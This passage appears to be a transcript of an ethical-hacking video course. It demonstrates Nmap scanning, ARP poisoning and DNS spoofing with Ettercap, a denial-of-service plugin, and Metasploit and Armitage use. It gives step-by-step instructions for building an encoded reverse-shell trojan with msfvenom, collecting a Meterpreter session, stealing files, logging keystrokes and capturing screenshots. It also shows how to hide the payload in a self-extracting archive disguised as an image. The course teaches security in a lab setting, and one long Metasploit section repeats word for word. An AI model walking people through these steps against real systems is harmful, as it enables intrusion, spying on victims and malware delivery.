away, and this is the SMB information revealed. Actually, it's a pretty much useful information. If you want to do a ping or sweep scan, use the -sn attribute. Pretty fast. Now, if you want to output the result of a certain scan to a text file, you use the -og attribute, and this is test output file, txt, and then the target IP. Here it should create now text file named test output. Let's see, and that's it. And here you go. This is the result of the scan. Now let's talk about the NSE, which is the Nmap scripting engine. Nmap comes with presets of scripts that you can find under USR. These are all the scripts that come with. Actually, you can invoke them while running for example, we can check for SMB vulnerabilities using this command: nmap show repository, select the SMB ports, and use this attribute script to reference any script. So I'll use the SMB OS discovery and the target IP, and here we go. This is the result of the scan and all the information related to the SMB. It is good actually to talk a bit about the Nmap scripting engine, actually, because it's one of the Nmap's most powerful and flexible features. It's not only to scan ports, no, It can be used to discover the network, to have sophisticated version detection, in addition to vulnerability detection, backdoor detection, as well as vulnerability exploitation. So users can actually rely on the growing and diverse set of scripts that are distributed within Nmap, or you can write your own script to meet any custom needs. NSE scripting is beyond the scope of this course, but it was very beneficial to give an overview on the powerful tool and the capabilities of Nmap. Man-in-the-middle attacks are very important network kind of attacks, and before going further, we need to start with the basics, and it's with the OSI layers. We have 7 layers corresponding to application, presentation, session, transport network, data link, and physical. You can use the sentence, all people seem to need data processing, to memorize this layout in a better way. The most important protocol we will discuss in this video is called the ARP protocol, which actually functions at the data link 2, and it is responsible to translate the IP addresses from layer 3 to MAC addresses. The example we'll be giving under the man-in-the-middle attacks is the ARP spoofing, or you can call it as well ARP cache poisoning or ARP poisoning. It has various naming. So actually, this is a technique by which the attacker sends spoof ARP messages to a LAN. Generally, the aim of this attack is to associate the attacker's MAC address with the IP of another host, such as the default gateway in most of the cases, causing the traffic to be sent to this IP address rather than the legitimate IP address. So, in the normal situation, if I am here, Mr. Nice, trying to communicate with the default gateway of the IP 192.168.1.1, I don't have the MAC address of the default gateway. So as you can see, the message propagates from the application layer to the physical layer, and it needs to be translated at a certain point of time from the IP address in the packets to the MAC addresses in the frames. So the computer will need to know the destination MAC address at a certain point of time before sending the data. From the top-down approach, the computer will send the messages to the default gateway of this IP that I mentioned earlier. So in order to know the next step, which is the MAC address, the computer sends an ARP request on the network asking all the hosts on the network who has the IP address of .1.1. So the computer concerned will reply by its MAC address, and this reply is cached on the Mr. Nice machine. This is the situation under normal circumstances. So in not normal or abnormal circumstances, Mr. Bad, who is the malicious user here, will have access to the network. It's very important to have access to the network, because this attack only works this way. He will have access to the network, and he will send ARP replies saying that his MAC address is associated to the IP .1.1, and as well saying that his MAC address is associated with the IP .1.2. So as you can see, there is no request for ARP, but Mr. Bad was able to send the reply. This is a vulnerability in the ARP protocol. You don't need to be authenticated in order to send a reply. So any host can just plug into the network and just send a reply to all the hosts on the network. So in this case, Mr. Nice will cache this request. Will cache this message that the IP.1.1 is associated with the MAC address that ends with 98-58. So as you can see, on the next attempt to send the data to the default gateway, the data will be redirected to the computer of Mr. Bad. And actually, this attack is used as an opening for other attacks, such as denial of service, man-in-the-middle attacks, session hijacking attacks. You can change the data, you can monitor the data. It can be active, it can be passive kind of an attack. As we said, the ARP protocol is the de facto protocol nowadays, communication, and it has this vulnerability. It's a stateless protocol where actually the network hosts will automatically cache any replies, as we said. So they will cache any replies that we receive regardless whether the network host requested them or not. Even if the entries in the cache that are not expired, they can be overwritten when a new ARP reply packet is received. As you can see, anyone having access to the network can take advantage of this vulnerability and just route the traffic to his machine. This kind of attack actually has some legitimate uses in some cases. For example, especially in server failover cases, some server can take on the traffic of another server in case of a failure, but this is not well used because it needs dedicated tools to be employed.
In this video, we'll see how to do actually ARP poisoning attack. You go to the Windows machine, which is the victim's machine, and type ipconfig to see that the default gateway of this machine is 211.2. In order to get the MAC address of this default gateway, just type the command arp-a and you'll see there are cached entries on this machine. The first entry is the default gateway and the MAC address ends with D2. So our attack will actually change this entry from D2 to a different MAC address, which is called ARP poisoning. We go to the Kali machine and open a terminal. Write ifconfig to get the MAC address of this machine, which is a malicious machine that will have access to the network, the illegal access of the network, and will send fake ARP replies. So as you see, the MAC address ends with 4B. A good tool to do this ARP poisoning attack is called EtherCap. It's under sniffing and spoofing. You open the application, press on the sniff menu, and press on Unified Sniffing, and select the interface. Then you go to the hosts and press on scan for hosts. So now this is scanning the hosts on the subnet that it actually resides on. As you can see that 4 hosts have been added to the host list. If you want to see the host list, just press on the host again and host list menu. As you can see, it identified 4 hosts. The IP address of our target machine is 129. So you select 129 and press add to target 1. So 129 now is our target. Next is to execute the attack. You go to the MITM man in the middle menu and select ARP poisoning. Then tick the option only poison one way and select OK. So now actually a fake ARP reply has been sent to our target machine. How to verify this? You go to the victim's machine again and then you type the ARP-A. Notice here the current cached entry is D2 for our default gateway. So now the entry changed to 4B, which is the MAC address of the malicious machine. So all the requests that are going to the gateway will now be diverted to go to the victims or to the criminals or malicious users machine. If you want to verify this, you go to Kali again and you fire Wireshark. Then you start sniffing. Then you go here to the client's machine, the victim's machine, and just open web browser and just go to the Google page. And if you go here again, you'll see that the communication has been established and the traffic is being redirected from 129 to our machine. If you want to filter here, just ip.source equal 129. And this is all the traffic that's coming from the victim's machine. If you want to verify real time, just open this again, minimize it, okay, and just open another website, and you see the traffic being captured real time.
We will now discuss an important DNS attack named DNS spoofing/cache poisoning. You can use these words interchangeably. DNS or domain name server is a piece of software that translates human-readable domain names such as google.com, facebook.com to IP addresses that are used to route communication over the internet. Normally, if the server doesn't know a requested translation, it will ask the next DNS server to do this translation for it, and so on and so forth. This is called recursiveness. To increase the performance, DNS servers usually cache these translations locally for a certain period of time before it expires. And this means the DNS server that caches these requests receive a similar request from a client. Next time, it will not go into the recursiveness or not forward the request to the next DNS server, but will reply directly from the cache. So here is the vulnerability. When a DNS server receives a false translation of a domain name to IP, it will cache this false translation for optimization purposes, of course. And now we consider the DNS server as being poisoned. So it will supply the client with the wrong IP address, which is usually an attacker's IP address, and a different type of attack there will start. So let's go directly to our Kali machine here and do some examples. For this purpose, I've created a fake page on my local machine in which I will redirect the users to. It's under var www html, and if you list here, you will see the index. We'll open the index.html file, and you will see that I've created a very simple HTML page just with this sentence here: you have been hacked. So now whenever the user, our target client, will type on his browser, we will redirect him to this page. We will use the EtherCAP application again, but before going that, let's do a couple of things. We have to do some configuration here. Kate ether.conf. That's the ether.conf here. So I will copy it and we'll open it here. So before you start with this attack, make sure to change the UID and GID to 0. Default configuration starts with 65. So whatever number is here, just make sure that it is 0 so you can use this file. Next thing, we will as well locate the ether.dns file. Copy again this file. Open it. Actually, this is the file that will have the fake DNS entry. So these are all commented entries. You can see this file, it has lots of translations. We're interested in these translations, so make sure to comment Microsoft.com entries for the host name. Just make the pointer there without comment and add this here. So add a star, so any request that comes here, I'm creating a host entry and we redirect them to this IP, which is the local IP. And make sure to save the file and then close the file. Now open the EtherCAP application and then do sniffing on the interface, then go and scan for the hosts. Now we discovered these hosts and here you go, these are the hosts available on the network. We are targeting this machine, which is the Windows 10 machine. So add it to the target and then go to the MITM and press on the R poisoning, sniff remote connections and start. Next, we'll have to load the DNS spoofing plugin. And here you go. Everything now is up and running. If you go to the machine, Windows machine, and try to open the browser, just type here www.google.com. And here you go. The DNS has been spoofed and you have been redirected to my own page. Here another type of attack might kick in, like we will see these attacks in the web application section. You can create fake pages that similarly look like other famous pages, etc. So actually this kind of attack can be mitigated at the transport layer or application layer by performing end-to-end validation. A common example is to use TLS and digital signatures. For example, here if you open a page that have HTTPS, you will not be able to perform this kind of attack, like Facebook. So this attack failed now because the user or the browser is checking whether the server's digital certificate is valid before establishing the connection. So this will not work. This will only work on websites that do not use encryption. In this video, I will discuss another type of attack on DNS called DNS zone transfer. It is actually a replication process between two servers, master server and a slave server, in where the slave server requests a copy of the zone file from the master server, and depending on the configuration of the master server, a transfer might take place or not. Looking here at the screen, you can see that a zone transfer is configured to take place only to the following server with its IP address. A misconfiguration here might take place if you select any server. Thus, anyone requesting the zone file will be able to get it. Unfortunately, some companies, they misconfigure their internal and external DNS namespaces, so that if this is misconfigured on this DNS server and you request a zone transfer, you'll be able to get a full map of the network. Thus, it's a very important piece of information to start with a network attack. The information that might be revealed from a DNS attack or DNS reconnaissance are these types of records. Start of authority, name server, any hosts configured on the DNS, canonical names, pointers, MX records, etc. So having this information is actually very important before starting any type of attack. So let's go directly to our Kali machine here and do a live example. I'll use a tool called DNS Recon, which is an advanced DNS enumeration script. It is written in Python and it's mainly used for DNS reconnaissance. It can enumerate DNS records, it can perform the zone transfer, and it can perform as well reverse lookups. You can invoke it by typing DNS Recon and you can type help. You'll be able to get all the help needed to invoke this script, such as the -n refers to invoking or mentioning the name server, R providing a range of IPs to do the reverse lookups, D is to provide a file with all the domains and subdomains of host names. What else? Another important parameter here is the A is to perform AX of R with standard enumeration. Actually, it's to perform the zone transfer. AX of R stands for a query for zone transfer. Let's go directly to example here. Use DNS Recon and the -d parameter stands for domain. I'll use a domain called zone transfer.me and invoke it. So here you can see that it's performing the DNS reconnaissance. It gets all the information about the SOA record, the name servers, the MX records, all of this information, as well as this TXT record, which is actually mainly used to preserve the originality of sending emails and the privacy of your domain. Do a further example here by using the -a parameter, which is perform a zone transfer to the same domain. As you can see here, it will take some time, but actually you can see that zone transfer has been done successfully. Okay, it's over. So let's go back to the beginning of this script here. So now it revealed the SOA record, the name server record. So it actually revealed two name servers. What this script will do is actually to loop through these name servers and get all the records associated with the name server. So here it's trying name server, the first name server, and this is all the information associated. Going further, this is the second name server, and this is all the information of the records as well. So, happy enumerating. Denial of service is actually a very simple attack that keeps the target system from operating as it should. In its very simple form, it uses up all the system's resources so that other people cannot connect legitimately and use this server. DOS attacks are actually the easiest attacks that we'll learn in this course. It only takes a small little kit to install an application, put the target IP, and just press enter so that the attack will take place. The DOS attack can be categorized under three headlines: volume-based attacks, protocol-based attacks, and application layer attacks. The volume-based attack is when the attacker sends a large volume of packets to the target machine, thereby using all the resources. Actually, here we're consuming the bandwidth. So we're filling the bandwidth. And these types of attack include ICMP and UDP floods. The protocol-based attacks is when the attacker utilizes all the resources of the target machine and
Such attacks include Smurf attacks, Fraggle attacks, Synfloods, and Ping of Death. Here we are not utilizing the bandwidth, but rather utilizing the resources of the server. The third type of attack is the application layer attack, where legitimate application layer requests are being sent to web servers such as Microsoft IIS or Apache server with the intent to crash it. Now I'll show you how to perform a DOS attack from Kali. Of course, not DDoS attack, because it's actually the same type of attack, but DDoS involves more than one attack source. To do this DOS attack, you open a terminal and then you write, we will use the EtherCap application again. EtherCap, then -G uppercase. It's the same way to open it from the menu, but here it's from the terminal. You go to Sniff, Unified Sniffing, you press OK, and then you go to the plugins menu, manage the plugins, and you select DOS attack. You double click on this plugin, it will prompt you to enter the target IP. So we'll use our Windows machine here, local Windows machine, and then you enter the same IP again. And here you go, it's activating the DOS attack, starting the scan, and then starting the attack. So simply by using the EtherCap application, you can launch a DOS attack. You don't have to reinvent the wheel to exploit systems. Use Metasploit. Metasploit is a framework that contains an extensive collection of exploits, and it's one of the very most popular open source free tools for security professionals. There is a commercial version available as well. In this tutorial, I will cover the basic structure of Metasploit along with some techniques on how to use it. So on the screen, you can see the framework architecture. You can access Metasploit using its interfaces, either through console using MSF console, or command line interface, or the web version, or other GUI tools that we will discuss later. The underlying modules of Metasploit are mainly 5. They are payloads, exploits, encoders, NOPs, and AUX. So let's start here with basic definitions before going into the details. What's a module? Module is actually a piece of software that can be used by Metasploit framework. And what is a vulnerability? Vulnerability is a weakness in the target system, such as the system is not patched or it doesn't have an antivirus, etc. Through this vulnerability or this weakness, a successful penetration will occur. What is an exploit? So once a vulnerability is known in the system, an attacker will take advantage of it and breaks into the system using a certain code or script written, which is known as an exploit. A payload, a set of tasks that are initiated by the attacker subsequent to the exploit in order to maintain access or do other tasks on the compromised system. You can call these listeners, rootkit, etc. But in our case here, and most of the cases in Metasploit, this is called Meterpreter, which is a shell that the user gets in order to control the system remotely. What is a shell code? As we said, it's a set of instructions used as a payload when the exploitation occurs, which results in the command shell or Meterpreter that we will see in the next video while doing the demo. Encoder is a module that, if I use the right word here, the technical word, it's obfuscate. So actually it's a module that obfuscates the payload so that it doesn't get detected by intrusion detection systems or antivirus. So it kind of wraps the payload in an iterative way so that it doesn't get easily detected by antivirus or other systems. Auxiliary is, it provides additional functionality to the system such as scanning, recon, and DOS attacks. And lastly, NOPs, actually it's a piece of software that prevents a payload from crashing on x86 systems by using jump systems. So just don't worry about that. So going further, it is important that you understand how are things stored on Metasploit system, and because this will help you using the framework in a better way. So let's go directly to the Kali machine and run Metasploit from there. So from here you can go to the directory user, then share, then Metasploit framework, and you'll see all the files related to the Metasploit framework. You can see the modules. If you go to the modules, you can see that they are auxiliary encoders as we explained earlier, and you can as well see that plugins are here. What else? The MSF console command,
other scripts, tools, etc. So actually they're all arranged on this directory here, Metasploit framework. So if you want to run Metasploit, you just, as we said earlier, it has different platforms to run, but we will use the MSF console, which is my favorite way, console, to run the Metasploit. So it will take some time to initiate the database and connect to it. So let's just give it some time here to run. As you can see, the cursor changed and we are in the Metasploit framework now. Before going further, in the previous architecture, we saw that it has libraries as well. We have three main libraries, which are Rex, MSF Core, and MSF Base. The Rex library is the basic library for most of the attacks. It handles operations like protocols, text transformation, sockets, etc. The MSF Core is the core library that provides basic API, and the MSF Base provides like additional or friendly API. So here we're at the MSF command line. I will give you some tips on how to get familiar with it and how to use it. First of all, you can search exploits. So as you can see, this framework has around 1700 exploits, 986 auxiliaries, 507 payloads, 40 encoders, etc. So how to search these? You can use these commands: search, type, exploit, and search type exploit, and it will list all the exploits that are available in the framework at the time being. It will list the date, the description of the exploit, the name of the exploit, etc., and the rank as well. We can use as well, we can fine-grain the search by specifying the platform, such as you can use search. Let's go to the command previously, and you can here specify the platform that we are looking for exploits into. So we can say Windows and hit run. You will get all these exploits related to the Windows system, which are many. A better example can be if we narrowed the search to Ubuntu, and here you can see that it returned the exploits that are pertain to Ubuntu. You can as well search common vulnerabilities, CVE. I want the common vulnerabilities that occurred in 2017, and here you go, it will list all the common vulnerabilities. I want to attack a specific system, per se WordPress, search name WordPress, and it will return all the vulnerabilities related to WordPress. So if we want to go further and select an exploit, just for the sake of giving this demo, we can say like use, and we can reference the exploit. So let's say that we want to use whatever, this exploit for example. So just copy it and paste it after the use and just hit enter. As you can see that the cursor changed and we are into this exploit now. So once we're into this exploit, we can issue a couple of commands like show targets. So it will show you the targets that this exploit will work on. In this case, it's WordPress 3.5. You can see it, you can use as well show info. It will describe this exploit. As you can see here, this module exploits PHP code injection vulnerability against WordPress plugin 3, a total cache of 4 versions up to including etc. So all of these exploits come up with real description there. And you can as well show options, and these are the options related to the exploits, and you can set these options by using, so here we have the target address that we're targeting, and we have the remote address and remote port. So we can set these in our exploit module and then invoke a payload and then send the payload to the target. So for example, if you want to set the remote host IP, you can use this command set our host and then 192.168.211.129, putting the IP of the Windows machine. And here you go, IP has been set. You can issue the show options again. You can see that here the IP has been set. Okay, and going further, we can use show payloads that are related to this exploit, and Metasploit will return all the payloads that are related to this exploit. Here you go, So you can use this payload along with the exploit. You can again use command, and let's see here we're using PHP meterpreter reverse TCP. Just use and paste. Okay, so if you issue show options again, you will see that. So you use show payloads and it will return all the payloads associated with this attack. So if you want to use this PHP payload, issue this command, use PHP / meterpreter, then reverse _ TCP, and the payload is now used. If you issue the command show options, it will show the options of the payload, and you can as well set localhost IP and the local port. Again, if we use this localhost, I'm setting the localhost IP to my IP .130, and here you go. So after you do all the settings of these options in the module and in the payload, you just press on the right exploit and the attack will be invoked. You don't have to reinvent the wheel to exploit systems. Use Metasploit. Metasploit is a framework that contains an extensive collection of exploits, and it's one of the very most popular open source free tools for security professionals. There is a commercial version available as well. In this tutorial, I will cover the basic structure of Metasploit along with some techniques on how to use it. So on the screen, you can see the framework architecture. You can access Metasploit using its interfaces, either through console using MSF console, or command line interface, or the web version, or other GUI tools that we will discuss later. The underlying modules of Metasploit are mainly 5. They are payloads, exploits, encoders, NOPs, and AUX. So let's start here with basic definitions before going into the details. What's a module? Module is actually a piece of software that can be used by Metasploit framework. And what is a vulnerability? Vulnerability is a weakness in the target system, such as the system is not patched or it doesn't have an antivirus, etc. Through this vulnerability or this weakness, a successful penetration will occur. What is an exploit? So once a vulnerability is known in the system, an attacker will take advantage of it and breaks into the system using a certain code or script written, which is known as an exploit. A payload, a set of tasks that are initiated by the attacker subsequent to the exploit in order to maintain access or do other tasks on the compromised system. You can call these listeners, rootkit, etc. But in our case here, and most of the cases in Metasploit, this is called meterpreter, which is a shell that the user gets in order to control the system remotely. What is a shell code? As we said, it's a set of instructions used as a payload when the exploitation occurs, which results in the command shell or meterpreter that we will see in the next video while doing the demo. Encoder is a module that, if I use the right word here, the technical word, it's obfuscate. So actually it's a module that obfuscates the payload so that it doesn't get detected by intrusion detection systems or antivirus. So it kind of wraps the payload in an iterative way so that it doesn't get easily detected by antivirus or other systems. Auxiliary is, it provides additional functionality to the system such as scanning, recon, and DOS attacks. And lastly, NOPs, actually it's a piece of software that prevents a payload from crashing on x86 systems by using jump systems. So just don't worry about that. So going further, it is important that you understand how are things stored on Metasploit system, and because this will help you using the framework in a better way. So let's go directly to the Kali machine and run Metasploit from there. So from here you can go to the directory user, then share, then Metasploit-framework, and you will see all the files related to the Metasploit framework. You can see the modules. If you go to the modules, you can see that they are auxiliary encoders as we explained earlier, and you can as well see that plugins are here. What else? The MSF console, command, other scripts, tools, etc. So actually they're all arranged on this directory here, Metasploit framework. So if you want to run Metasploit, you just As we said earlier, it has different platforms to run, but we will use the MSF console, which is my favorite way, console, to run the Metasploit. So it will take some time to initiate the database and connect to it. So let's just give it some time here to run. As you can see, the cursor changed and we are in the Metasploit framework now. Before going further, in the previous architecture, we saw that it has libraries as well. We have three main libraries, which are Rex, MSF Core, and MSF Base. The Rex library is the basic library for most of the attacks. It handles operations like protocols, text transformation, sockets, etc. The MSF Core is the core library that provides basic API, and the MSF Base provides like additional or friendly API. So here we're at the MSF command line. I will give you some tips on how to get familiar with it and how to use it. First of all, you can search exploits. So as you can see, this framework has around 1700 exploits, 986 auxiliaries, 507 payloads, 40 encoders, etc. So how to search these? You can use these commands: search, type, exploit, and search type, exploit, and it will list all the exploits that are available in the framework at the time being. It will list the date, the description of the exploit, the name of the exploit, etc., and the rank as well. We can use as well, we can fine-grain the search by specifying the platform, such as you can use search. Let's go to the command previously, and you can here specify the platform that we are looking for exploits into. So we can say Windows and hit run. You will get all these exploits related to the Windows system, which are many. A better example can be if we narrowed the search to Ubuntu, and here you can see that it returned the exploits that are pertain to Ubuntu. You can as well search common vulnerabilities, CVE. I want the common vulnerabilities that occurred in 2017, and here you go, it will list all the common vulnerabilities. I want to attack a specific system, per se WordPress, search name WordPress, and it will return all the vulnerabilities related to WordPress. So if we want to go further and select an exploit, just for the sake of giving this demo, we can say like use, and we can reference the exploit. So let's say that we want to use whatever, this exploit for example. So just copy it and paste it after the use and just hit enter. As you can see that the cursor changed and we are into this exploit now. So once we're into this exploit, we can issue a couple of commands like show targets. So it will show you the targets that this exploit will work on. In this case, it's WordPress 3.5. You can see it, you can use as well show info. It will describe this exploit. As you can see here, this module exploits PHP code injection vulnerability against WordPress plugin 3, a total cache of 4 versions up to including etc. So all of these exploits come up with real description there, and you can as well show options, and these are the options related to the exploits, and you can set these options by using, so here we have the target address that we're targeting, and we have the remote address and remote port. So we can set these in our exploit module and then invoke a payload and then send the payload to the target. So for example, if you want to set the remote host IP, you can use this command set our host and then 192.168.211.129, putting the IP of the Windows machine. And here we go, IP has been set. You can issue the show options again. You can see that here the IP has been set. Okay, and going further, we can use show payloads that are related to this exploit, and Metasploit will return all the payloads that are related to this exploit. Here we go. So you can use this payload along with the exploit. You can again use command, and let's see here we're using PHP Meterpreter reverse TCP. Just use and paste. Okay, so if you issue show options again, you will see that. So you use show payloads and it will return all the payloads associated with this attack. So if you want to use this PHP payload, issue this command: use PHP/meterpreter, then reverse_TCP, and the payload is now used. If you issue the command show options, it will show the options of the payload, and you can as well set localhost IP and the local port. Again, if we use this localhost, I'm setting the localhost IP to my IP .130, and here we go. So after you do all the settings of these options in the module and in the payload, you just press on the right exploit and the attack will be invoked. Once you generate the payload, now it's time to move this file to the victim's machine. Many ways are there. You can send it email, crafted link via email, but for the purpose of this tutorial, I will send it directly using file shares. So from the Windows machine, you can create a folder. You can call it to mount, and you need to share this folder by going to the properties, sharing, and allowing everyone to read and write to it. And here you go. You can see that this is the mount link or the share link. Okay, and then we go to our Kali machine. We open a terminal. Now we need to install the common internet file services in order to be able to mount. So for this purpose, we issue this command: apt-get install sys-utils, and then we go enter. Now we have this package ready and installed. We can issue this command in order to mount the file. So mount.sys, and then we enter the path of the machine, of the target machine. So actually this is the path of the target folder on our machine. So we want to mount this folder to a folder which is found on the desktop. Let's create it here and let's name it WinMount. Okay, so this folder exists on the desktop. So this is the path, the top, and then it's called WinMount. Now we use the O parameter to specify the user on the Windows machine. It's IE user, and then we hit enter. Now it will ask us to provide the password of this user, the IE user. That's the password on the Windows machine, of course. And then you hit enter. Now you have this file folder mounted. So you can just drag or copy any file here. Let's try to copy this file here, test file. Copy it to this folder here, and then we go to our Windows machine, open this to mount, and you'll see that this has been copied. Now you do the same with the payload, just copy it here and double click on it on the Windows machine and it will be invoked. Lots of attacks can be easily performed on Windows XP, but this operating system is kind of obsolete now, so I will do this demo on Windows 10. So let's get into the bread and butter of this and exploit Windows 10. You can as well practice by downloading and installing the Metasploitable form from the Rapid7 website. Metasploitable is an intentionally vulnerable Linux machine that you can use to evaluate and perform a lot of exploits within Metasploit. So let's explain this attack first on Windows 10. It is very simple. First, we will create a malicious executable program, the payload, for the target host, and then we will run this file on the target host, and it will actually expose its shell to the attacker, which is the Kali machine, and the Kali machine can now remotely control the Windows 10 or the target machine. So let's start here. First of all, we need to run the Metasploit form, Metasploit the framework. Let's start the service. You can run it first directly, or you can use service PostgreSQL start. It will start the database services. After that, we will run the Metasploit using MSF console. It is important to note that this attack can be done on a LAN and over the internet. Just change the IP addresses. So let's use the command called msfvenum. msfvenum is a combination of two commands that are there in Metasploit, which are the msf payload and the msf encode. So now they are both in a single command, which is called MSF VNode. So earlier, the MSF payload was used to generate the payload in a specific form, and then the MSF encode was used to encode the payload using various algorithms. So now you can use one command to do both actions. Now, after that, you specify the payload. Here we will use Windows Meterpreter reverse TCP. So this is the payload that we'll be using. As we said, that the victim will expose its shell to us and we will be able to control it remotely. Then we will specify localhost IP, which is my IP. Just a double check here. So my IP is 211.130, 192.168.211.130. Then I will specify the local port, which is, you can choose any port. I'll choose 5555, and then -f, which is the file extension that I will use to generate this payload, which is exe. And then I use -e, which is specifying the encoder. I'll select this encoder. There are lots of encoders, so this is my preferred one, Shikata Ganai, and then you specify how many iterations this encoder will do to this payload. I'll select 10 iterations, and then create a file called, what do you want to call it, Trojan. Let's create a file called trojan.exe. Execute that, and actually this will create a file, the Trojan file, for us. Let's open a new terminal here. As you can see that the file has been created with a size of 73802 bytes. Just to double check, just list it here and you'll be able to see that the trojan.exe file has been created. So now we are ready to move the file to the victim's machine and execute it there. And upon successful execution, the target system will be fully compromised and we will be able to control it remotely. And the result will be a Meterpreter call for us, which is a command line for us to perform any type of command remotely. So as we did before, we mounted this folder to the Windows 10 machine. So let's just copy the file that we've just created, which is trojan.exe. Let's just move it to Windows machine, Windows mount, and let's go to the Windows machine. So here on the Windows machine, you just double click on the trojan.exe and it will execute. Now we go to our Kali machine and we'll just issue this command, use, just issue it in the Metasploit, use multi-handler, then set payload Windows Meterpreter reverse TCP, then set lhost to 192.168.211.130, then set lport to the port that we set before, 5555, to listen to the incoming connections on this port. And now all we need to do is to exploit. So as you can see here, that this session has started a reverse TCP handler on the IP 211.130, which is our IP. So if you go again to the Windows machine and double click on this file, a Meterpreter session will be open between the two IPs, 130 and 129. And now we have shell here that we can use to do whatever we want. So let's first use help. You can see all the commands that you can run here on the shell that just opened, the Meterpreter. This is very important. Just start by typing help and it will guide you through all the commands. You can, for example, use sysinfo just to see the system info of Windows 10. As you can see, the computer name, the OS, the architecture, the domain or the work group, and the currently logged on users. You can use ls to list the directory, the current directories. You can use as well ipconfig to see the network configurations of the remote machine. You can as well use the search command to search for any file on this remote machine. So get me all the files that have the doc extension on this remote machine, and these are the files. You can as well search for files of type .txt on the remote machine, It will get you all the files with this extension. You can as well select any file and choose to download it. So I want to download this Hobbit file. Just paste it and make sure to change the backslash to /. You can go to new terminal and just press list and you'll be able to see the Hobbit file here, the Word file here as well. So this is some of the commands that you can run on the machine, and one of the most important command is the upload command. So you can upload like anything, your trojan2.exe, you can upload it to C, Windows System 32, whatever. So let's try to upload here, whatever, any file, like hobbit.exe, sorry, hobbit.txt, and it's uploaded successfully. One of the most important commands as well is the shell command. So once you press shell, you'll be able to acquire a Windows shell and you can do all the commands from here. If you're suffering with Metasploit commands, Armitage is your tool. Armitage is a GUI for Metasploit. It visualizes targets and recommends exploits, in addition to exposing a lot of post-exploitation features. Metasploit allows more than one person to carry out an attack by sharing the Metasploit session, so a teamwork here is allowed. Armitage automates lots of the tasks that are somehow difficult to do in Metasploit. It can import, scan data from other applications, and it can as well scan the data and scan ranges itself. On top of that, Armitage allows you to take advantage of a compromised target to launch an attack from this compromised target to the LAN. So let's get to the bread and butter of that. Let's open a terminal here and run the PostgreSQL service. So it's important to run the service, the database service, in order to make Armitage fast. You can invoke Armitage from the command line here, as well as you can just invoke it from the menu under the exploitation tools. Just press connect and press yes, and the GUI interface will display. The interface is really easy. You have 3 panes. The first pane is the target pane, and the second pane is the module pane that we already discovered in the previous videos, and the below pane here is the console pane. You can start by scanning hosts. Let's do this quick OS scan. It will prompt you to enter a range. I will enter the range of my LAN in this way. So it will scan the full subnet of class C of 211. I just wait for a while. It will scan all the subnet and it will display the available operating systems on the network. It's important to know that if you don't have Armitage installed, you just can install it from the terminal by issuing the command apt-hash or -get space install space Armitage. So now the scan is kind of over. Scan is complete. And as you can see, it returned to me 5 machines. 2 of them are of Linux and 2 of them are Windows. As you can see, the icon of the operating system is displayed for ease of use. If you have a lot of machines here that are returned, you can simply go to Armitage and set target view to table view. You will see them in this list form. So from here, you can select this machine or any machine and, for example, list the services it has. You can as well go to the menu of attacks and press on the submenu find attacks. So now Armitage is searching in the attacks database for relevant exploits pertaining to this machine under this operating system. So as you can see, it's a very powerful tool that can save you a lot of time. The attack is over, and if you right click on this machine again, a new menu will appear, which is the attack menu. You have various lists of attacks here that you can try. It's important to note that attacking a computer is not that easy actually. especially with the modern advent of these security layers. We have firewalls, intrusion detection systems, and even you have antiviruses that may stop you from running lots of payloads. But it's important to know that these features exist. Same thing here for Linux. You can use any of these attacks. One of the important features of Armitage is the Hail Mary. Hail Mary actually is the brute force kind of attack for Armitage. It will try all of the relevant attacks, but this will actually consume the network a lot. So it's not recommended to try it. It's recommended to try attacks one by one. So on this left pane here, which is the module pane, you can simply click on the module itself. It's a file tree structure and it's easy to navigate. The bottom pane here, as we said, is the command line pane or the console pane, where you will see in the background the commands that are being invoked by Armitage. So let's go to the bread and butter and create payload from Armitage. Let's go to, so now I'll create a payload, move it to the Windows machine and run the payload from the Windows machine and have a Meterpreter session from Armitage. So I'll go to Meterpreter here, select reverse TCP and make sure to select a port that is easy to remember. Do 9090. From the output here, select exe file. So now we will create an exe file, which is our payload. Open the desktop here, go to the WinMount. WinMount actually is my folder that is mounted to the Windows machine. So I'll do this, virus101.exe. So now the payload has been created and has been moved to the Windows machine. Moving the malicious file to the Windows machine can be done through lots of techniques used by social engineering, which we'll discover later on. So the file has been moved to the Windows machine. If you go here to the Windows machine, what's that thing? Okay. And you go to the mount. So here you go. This is the virus101. Okay. So now we have to go again to the Kali machine and create a handler which will handle the incoming connection from the compromised target. Again, you double click on this reverse TCP here. Make sure to select multi-handler and make sure to use the same port that we used earlier. Now a session has been created and listening to incoming connections. Now you go to the Windows machine and just double click on this virus101 thing. If you go directly again to the Linux machine, you will see that a Meterpreter session has been opened. And it's important to note here that the icon for the compromised target will change to red. It means that this target has been compromised. So what can we do now? Previously, using the Metasploit, we used to enter commands in order to manipulate the target system. But now here it's easy. If you go to the Meterpreter session here, you can see the list of attacks or actions that you can perform on this compromised machine. For example, you can browse the files. You can list the drives here. So now you have remote access to the file system of this machine. You can as well, of course, have the command shell. Let's discover more. You can have a screenshot of the current desktop of the compromised machine. So here you go. This is a screenshot. If the compromised machine has webcam, you can stream live data from this webcam, but my current machine doesn't have webcam. Another important feature is that you can log keystrokes from that machine. So the keystrokes listener has been initiated. If you go here to the Windows machine and type anything, hey, so the keystrokes has been captured and displayed here. As you can see, Armitage is a really powerful tool, and I just have given you the basics for you to explore more and learn more. Moving the file or the payload file that you've created on Armitage to the target machine is not easy actually. And it happens through lots of channels of social engineering that we will learn later on in this course. But for the sake of giving you just a teaser, I will now create a payload and attach it to a JPEG file. We go directly to the Windows machine, and this is the virus payload that we created earlier, the .exe file. I've downloaded a nice image from the internet, the smiley face, and I have converted it to an ICO or icon image on JPEG to ICO, which is a free website. So now we have 3 files. You have to install as well. You have to install WinRAR for this purpose. So just select these 2 files, the payload file and the JPEG file. Right click and select Add to Archive. We want to create an SFX archive. SFX is a self-extracting file. So once you double click on it, something will happen in the background. And what we will do now is that we will let the user double click on it and just see a JPEG file being displayed. But actually what's happening in the background is that the virus or the payload is being run as well. So select SFX archive, go to the advanced options, select SFX options, go to text and icon and just select this icon. Then go to the modes and in the silent mode, select hide all. So the user will not see what's happening in the background. Then go to the setup and select the program that will be run after the user double click on the file. So we will run this JPEG file and we will also run this virus 101.exe. Now we're ready. So we have this test Trojan here. You can rename it to whatever. I'll rename it to screensaver. And here you go. You have this nice little file which is screensaver.exe. You can send it to any user. Just for the sake of this demo, I'll create a new file here and move it. Okay, if you go back again to Kali, you'll see that there is no session happening here or no connection for compromised target. So from the Windows machine, you just double click on the screensaver and here you go, a very nice JPEG image will display. If you go again to the 